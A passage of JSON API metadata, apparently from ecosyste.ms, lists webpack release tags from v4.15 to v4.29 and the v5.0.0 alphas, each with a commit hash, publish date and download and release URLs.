e.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3b